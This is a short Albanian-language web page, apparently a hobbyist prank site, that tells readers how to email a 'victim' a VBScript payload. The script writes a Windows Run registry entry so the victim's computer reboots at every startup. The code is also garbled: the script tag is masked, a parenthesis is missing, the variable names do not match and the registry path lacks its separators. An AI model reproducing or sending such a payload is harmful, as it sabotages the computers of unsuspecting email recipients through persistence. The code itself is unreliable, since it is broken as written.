Music:

   
  K!nnezzi.
  Prishja dikujt Pc
 
Bre me mur
Code te cilat e shkymin kompjuterin edhe code te tjera
 
 
Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

</script>
--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shymet                  
 
  Today, there have been 3 visitors (10 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free